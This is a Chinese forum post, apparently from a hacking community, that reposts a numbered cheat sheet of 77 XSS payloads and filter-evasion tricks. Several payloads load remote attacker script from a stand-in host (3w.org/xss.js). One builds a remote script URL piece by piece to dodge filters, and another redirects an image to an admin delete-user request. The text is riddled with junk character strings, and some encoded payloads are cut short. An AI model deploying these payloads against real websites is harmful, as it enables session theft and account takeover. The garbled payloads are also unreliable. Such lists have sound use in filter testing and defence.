貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
6 n. L( t! q6 J4 S" x; A+ M
' D) U, K. b# z2 V (1)普通的XSS JavaScript注入
( j4 z9 w/ T1 b% g# o: u <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ L0 r F8 T6 }0 O% ~. Q) W
, k) M' L& T) m" @
(2)IMG标签XSS使用JavaScript命令
& l; o4 G8 ?1 {6 O; A C <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) c& j) G. @& j2 q1 n# b7 {6 p
c7 [" y9 W# B1 H' r% g6 k; @
(3)IMG标签无分号无引号( V2 b) W% e3 C
<IMG SRC=javascript:alert(‘XSS’)>$ Y. Q' v* N M: _3 {
7 I4 h* E- M% a2 T2 P3 B% U, V
(4)IMG标签大小写不敏感9 O' W$ y2 V! v" w1 c! H+ `8 s
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; x8 z. B& j8 _ ~" d6 J2 c$ p6 N( z+ I% U/ @) N- L# u
(5)HTML编码(必须有分号)
! s7 ?- c5 ~, v. {8 k <IMG SRC=javascript:alert(“XSS”)>
2 a7 s* C6 H, r! o9 G
# ~1 D0 u8 U6 a: n (6)修正缺陷IMG标签
5 h) U* H2 O" r+ ` <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ i) T. t! [. [ O. `
1 g$ |: \8 r: A$ s: w+ v$ Z (7)formCharCode标签(计算器)
j& W* K' r7 Q <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>: n4 f7 x& X3 M j ~# d1 j
4 V, q( Q3 t% J1 t, e: y1 ^( S8 {
(8)UTF-8的Unicode编码(计算器)( r6 r) Y! ^1 e4 l
<IMG SRC=jav..省略..S')>
2 g' u" B f; v( T8 d k$ `8 B% w! ?5 h; ~- ?9 @
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)8 q; T6 u- x) N* b6 M( k# p
<IMG SRC=jav..省略..S')>
! g+ J$ o- q. p/ n& F
) B2 E0 s- m1 r7 s2 S2 @ (10)十六进制编码也是没有分号(计算器)
3 }! E6 c7 c7 `6 N1 x' L <IMG SRC=java..省略..XSS')>& r* N* J% X1 _ @
9 ^9 Z, {, E# L% w. _* ?
(11)嵌入式标签,将Javascript分开" a+ C+ m$ z7 l+ T2 `( N
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# E. L5 P' i4 m4 A3 K' x- v# k" n s& D$ N
(12)嵌入式编码标签,将Javascript分开$ V/ H* j U2 k
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 X# v, a& B8 U
2 ?& B" y" @- Q7 y5 q (13)嵌入式换行符
5 {( ?3 K' D/ H; c2 K6 O <IMG SRC=”jav ascript:alert(‘XSS’);”>; t+ g7 Y; A( j4 q6 z: r7 M
) r3 Z- u& a0 ]0 ]9 ` (14)嵌入式回车
' M2 B( N; s7 r0 J' F <IMG SRC=”jav ascript:alert(‘XSS’);”>) ?0 ?$ @3 v- L2 \- q
6 c* k5 a( O3 ? I' h2 t' O (15)嵌入式多行注入JavaScript,这是XSS极端的例子
! Y" O. N1 N7 T( J+ X# ` <IMG SRC=”javascript:alert(‘XSS‘)”>2 [* }" d& M: e' o6 u
T2 M" u1 J7 N7 s9 B; b! s (16)解决限制字符(要求同页面)
5 u! `; L6 z/ w4 L& V% n7 n6 W <script>z=’document.’</script>- A8 x: m/ _4 J
<script>z=z+’write(“‘</script>6 u: {0 b: G7 _0 v* j1 w* b
<script>z=z+’<script’</script># ~. A% r7 j D
<script>z=z+’ src=ht’</script>, _* N6 x1 W9 C* e# J/ s
<script>z=z+’tp://ww’</script>
2 g6 S1 H" f; C8 G1 V <script>z=z+’w.shell’</script>% L0 u* t; O8 p F' o' p
<script>z=z+’.net/1.’</script>
2 o) m7 i6 Y" X% ~3 G <script>z=z+’js></sc’</script>
; R0 |) A8 L! D8 s% {7 [: p1 g8 a2 r- Q <script>z=z+’ript>”)’</script>
o5 s( S, G0 Y% a# I <script>eval_r(z)</script>& L" D! ]) J5 L. f9 w/ x2 ~
6 `4 g n: ?' l: v# C+ Q (17)空字符1 J& b, e+ \+ [$ D! K
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out! U0 x# O; D$ w% U5 [+ A
2 Q$ H2 J( ?+ k4 {. M (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用9 D: d1 }( P3 s: T# q. V" _; V8 T6 v
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 R* ?. k; i) [* ~# g) G
9 I6 K" M' ~& m O! n- S4 F) \
(19)Spaces和meta前的IMG标签4 r9 F4 ~- j% M! V
<IMG SRC=” � javascript:alert(‘XSS’);”>+ n% C1 }1 Q, }, q# W3 Z+ h- B/ N
; T7 r- t) T5 d- G. ~; I (20)Non-alpha-non-digit XSS
( `' w' I* e% w+ c g <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 r% W2 }+ N% u" z! |. D' j
$ z; v i3 q) p% C7 V- d
(21)Non-alpha-non-digit XSS to 2' l) E1 y4 a( U# |/ k
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
9 P7 i; i) W# l5 x z0 `. S! g% g* V
(22)Non-alpha-non-digit XSS to 30 o5 ~' j g' C- W+ ~; E6 B
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 r8 {; B0 U# l: H8 m( `3 k7 t5 ~) F, w" A, _2 W2 d9 z0 n
(23)双开括号( j3 D# S1 u$ c7 T1 s+ W
<<SCRIPT>alert(“XSS”);//<</SCRIPT>! S) J# }. f5 f+ W; a4 r4 \( g
& |% o0 Y/ A" W2 {1 u: G2 h
(24)无结束脚本标记(仅火狐等浏览器)
7 P/ V2 V# b4 u8 V9 t$ U <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>; h) V) B6 m0 i! r4 b! w7 w; X+ x6 \
8 V8 I- b5 I% y- X* ?4 p3 @: ^
(25)无结束脚本标记2
, e; F; H7 A% ^. ` <SCRIPT SRC=//3w.org/XSS/xss.js>
2 O: a. |* _0 b8 ^* ]9 w, d. u6 r2 o& E/ u/ x x
(26)半开的HTML/JavaScript XSS
5 f9 ]- ^, Z! x <IMG SRC=”javascript:alert(‘XSS’)”
( u! Y' c2 k9 a$ v/ Q/ o3 E5 P
, j* N. B, x" m4 G) x4 Y5 b (27)双开角括号8 R2 A0 R% q" n" n
<iframe src=http://3w.org/XSS.html <9 _3 U# f8 X) A" I, g
1 |, `8 G6 q. L; _
(28)无单引号 双引号 分号
& u4 W( E+ K) h! R <SCRIPT>a=/XSS/# {1 X) q* l7 D+ q4 P0 z
alert(a.source)</SCRIPT>
# p; u2 q- Y% r) k7 A4 o+ |
$ o7 T% @, M( O% S1 Z (29)换码过滤的JavaScript+ t7 x$ v: f+ @, a% X
\”;alert(‘XSS’);//
) P5 ^7 |% p) g% w2 @- M- s( r ?7 [, H- @0 H6 y# b, x9 @5 U
(30)结束Title标签
. Z; j: N' h4 U </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 [0 v9 f$ Y* H; V* P9 ~
3 W( a' ]7 h' }: M
(31)Input Image: M& d, w9 O$ }' Q
<INPUT SRC=”javascript:alert(‘XSS’);”>
2 p$ {5 r) C% f* z$ D: w" N/ T
1 k7 f9 Q8 ?& P$ u$ X (32)BODY Image
' W% p! |# ] Q; G <BODY BACKGROUND=”javascript:alert(‘XSS’)”>' I0 T1 S) M5 A! O0 ~% O) d
i: o: M: c3 n2 w/ L, E
(33)BODY标签/ s& q9 a- {& B) p+ @
<BODY(‘XSS’)>
7 J. \) i1 w. F f
6 H% ~& J' J2 r3 f6 \1 r (34)IMG Dynsrc, L' S3 a. u% G# O2 c7 J
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
2 m& d4 t2 C) V
! t( j' Y$ r6 O (35)IMG Lowsrc
* W) l; \, I& l0 _ <IMG LOWSRC=”javascript:alert(‘XSS’)”>0 Q% k2 n0 _/ }" o, z$ \3 I2 K
2 o) a9 R+ p! H2 M9 H5 q (36)BGSOUND. v# f- a% L* `
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
; |0 k6 ^# r) F0 G7 Q5 X* o4 i* `9 O# \# G
(37)STYLE sheet! p, Z! M; j. J( a3 N! Y+ ~* H% W" e
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
' t/ Q; t: @! G, w# d% [' d/ i) R3 w2 w. a N6 S' J; _
(38)远程样式表
; b0 m6 h% E+ Z, u <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>* O4 l8 Q" n, Z, o3 p
4 y# \& O; J- @6 c (39)List-style-image(列表式)" P5 b# t& }. v0 R+ J
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ l' g3 {4 w5 @5 h0 H; y5 w
+ p/ z) | I4 `/ w5 z: c6 a
(40)IMG VBscript& ?7 X8 w' j% f5 ?8 j' ?" P, V
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS, u/ `4 P6 ?# n5 n( O$ ?
1 U( Y% E, n2 r4 ~* g (41)META链接url
* v6 h* D: m8 j. ?5 {- J: I: Z/ s <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ S }. ?, E9 f1 y' X8 o) T# E) ^! W
T* N$ Y$ [8 T" ]/ J; p
(42)Iframe1 _$ S, k! ^. c6 u
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
. m% g4 j& w3 w: ]! r5 ^+ H" L6 a8 P+ ]+ L$ `! G# X9 i/ s- [8 W) j
(43)Frame" e& `! g3 P3 O
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET> v" `1 s; D. c. I7 c% F0 s
; o" q- V" B2 [# Y# N! r (44)Table8 M' H0 m# ?/ K% f% ^
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>0 J, |. }) Q* q! Z
3 j$ T) j' K; i" N7 L (45)TD9 m- s4 t7 W7 s! r5 U, _
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ }# k# A- k) S% ~6 h8 j* y. U$ u$ c
(46)DIV background-image! ~( Y# W, ^2 k+ ^( ~6 T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" ^% r0 C4 q% q9 {; @' ~6 [
( w+ k n6 X7 d) N (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279). ~9 }8 ~6 { P2 K% u# c3 h7 t8 t& X
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
2 G4 u6 F7 W$ ?% F) ~1 _9 Q( n* K% J* x: l8 i
(48)DIV expression8 o$ m! P8 n/ \0 Y
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
5 F; @+ K) ^% P; S6 y M9 ]. C, x1 S5 i
/ }, \7 m# v! V (49)STYLE属性分拆表达
- L* {: f$ \! S/ P# W! ] <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>" H0 U& F/ ^/ i% m7 l x& M* O/ K1 ~
3 Z: S) U& y3 K9 i* B1 f' F- m( y (50)匿名STYLE(组成:开角号和一个字母开头)
$ q( {' R9 n% u h K <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: N5 @* Q6 ]7 Y( u& @- j
9 }+ W# [! ^/ b: f# X% L
(51)STYLE background-image
" R5 P7 f8 h# ? <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>. s* i b! _6 M a. g. q! q6 P
- C/ o2 L7 X8 ]7 k: j (52)IMG STYLE方式
/ ]& D$ k2 T. z5 y) I- d exppression(alert(“XSS”))’>
0 a% j9 k2 n8 Z. w4 W5 T! Q8 ~
! H! ~. i( J) F! |) C6 e% k (53)STYLE background
. b6 D" u. b0 T2 r <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* p0 C- e/ z6 X6 i% A5 l6 N' f. k
+ J/ G- ]3 e- ?: v w* S& v; f (54)BASE
' {; w( P; c7 f% z0 N <BASE HREF=”javascript:alert(‘XSS’);//”>
1 X }+ }" l. m5 ?( s7 r" y# E
* ^4 r# B* d$ K6 _7 m" Q1 y) E (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 q5 s, {; Z" ^5 h! k. s
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>5 q' j2 ]3 k2 i9 D) }9 [
/ C+ T- c& x" \2 |4 b4 U3 [! O9 s5 p: x% \
(56)在flash中使用ActionScrpt可以混进你XSS的代码
: ~7 J+ J% G, P5 H8 c a=”get”;
3 E9 t3 ?' m9 |8 K b=”URL(\”";
( e. I. O/ G2 e1 O c=”javascript:”;
" }/ N( s% q* z. W1 t/ N: a' j; H d=”alert(‘XSS’);\”)”;' c; P" n* b. V* z, e+ u
eval_r(a+b+c+d);
0 W$ P. l. ~8 _
9 r1 u6 e% v" _$ ?8 j& a4 \& k (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
1 r3 v w3 W% @, l' H <HTML xmlns:xss>+ S% t+ y8 t! a% x! s8 g, H) n) M' o
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
! D2 A7 F/ J$ |4 {$ K/ F <xss:xss>XSS</xss:xss>6 W; D j7 i( k9 W
</HTML>
$ q* `; ~5 l d
* o ^9 X4 M. Y2 o6 b (58)如果过滤了你的JS你可以在图片里添加JS代码来利用4 s1 j6 M7 d# Z C. y4 y
<SCRIPT SRC=””></SCRIPT>
* j4 M$ w" |9 ], u/ p
* p! M8 J; E3 k3 d (59)IMG嵌入式命令,可执行任意命令
! {3 Y# Y# O, A7 ^- ? <IMG SRC=”http://www.XXX.com/a.php?a=b”>. h; F/ q! @8 {3 T
. [4 C% c, ^# ~, S9 D
(60)IMG嵌入式命令(a.jpg在同服务器)7 ^1 N- A3 T1 n% b; k {* ^$ _
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
4 Y& p) r6 b- a4 N( p( K/ Y7 W; N) f/ X, _6 Z; Q3 r4 Z# d
(61)绕符号过滤
2 Q( \, a- N6 V2 [% U <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>% {. j; A- N+ o( Q- v
' s" j/ I9 C D& S+ Y
(62)+ h* ^$ h2 j8 P& r( n
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT> e' x6 J3 I1 v9 y: w1 I% \
4 k7 `+ L8 g. u
(63)
' L+ R. \ i8 g <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>6 O4 o1 z. P9 D5 @
; q) \/ K1 R+ A ]; I (64)
2 c4 e( U! b9 m8 ~- B <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
, W( V! y2 w# [/ ^+ j5 D
/ T: L# b, g+ L (65)! K% p% [( P) H" Z' p5 M0 u+ z
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>2 D8 s ]% O& v- \. o4 p5 Z( j1 G
7 D$ R1 N9 E9 l2 Y3 C) a
(66)0 t3 G% d: C9 f) }$ N
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
; C! I7 M: n' H- q3 L/ r% H& \4 W% R; O1 R
(67)
( i3 W% H2 F8 |* L5 j- {+ Y <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>. }6 y3 L8 p( R" w
- d( R# l6 a3 U
(68)URL绕行
2 _* g* t( x. V t$ X <A HREF=”http://127.0.0.1/”>XSS</A>
& a& s' s+ s. L9 A3 z5 N! R- ]0 \4 I, Q. ~5 u4 ?* |
(69)URL编码& S; ?2 M2 q0 K9 e
<A HREF=”http://3w.org”>XSS</A>
- s9 K! P3 I b+ J: z) P
) |) _8 C5 U$ W. c/ U (70)IP十进制+ x* _, i& f# ?$ J
<A HREF=”http://3232235521″>XSS</A>
' R7 L D% Y( N8 X$ S' ^
+ C5 n( m8 Y6 C/ S (71)IP十六进制
7 j& o3 e& l9 @& `2 Y0 s5 j <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A> z# c0 n' s. v
) r8 L; x3 @& s5 n1 T
(72)IP八进制
' e5 h+ L X+ _* R t; I; R <A HREF=”http://0300.0250.0000.0001″>XSS</A>
- t [6 n% W$ X( k2 V) v% X2 N( a: L1 F7 b# s. ` R
(73)混合编码. n* w$ r9 ~* z' _; C
<A HREF=”h
: j' |5 m( d) y. z- W) J8 p- s/ ] tt p://6 6.000146.0×7.147/”">XSS</A>
2 v: w& m" @3 i2 d+ U0 f3 b# B* Z( _9 G. Y
+ P' a1 v/ h1 E# U i (74)节省[http:]
( e! [+ V. y- n- L Q" H <A HREF=”//www.google.com/”>XSS</A>
# i, [; Q# R; f* Z& U; E+ V
4 e1 t1 _) D2 L7 Z; O. o (75)节省[www]
! }& {2 \- p* u5 F% R6 h* A7 e* } <A HREF=”http://google.com/”>XSS</A>
3 R8 @7 Z5 L4 p$ k. t# `! r+ ~( H3 C- Z7 {" d( f/ \. t, a9 H! ]
(76)绝对点绝对DNS
" v4 W1 z8 w0 Y. o( M <A HREF=”http://www.google.com./”>XSS</A>' i% ]- @* u) q. E
% x$ d) Z3 ]3 }
(77)javascript链接& s- Y# R" c ^
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对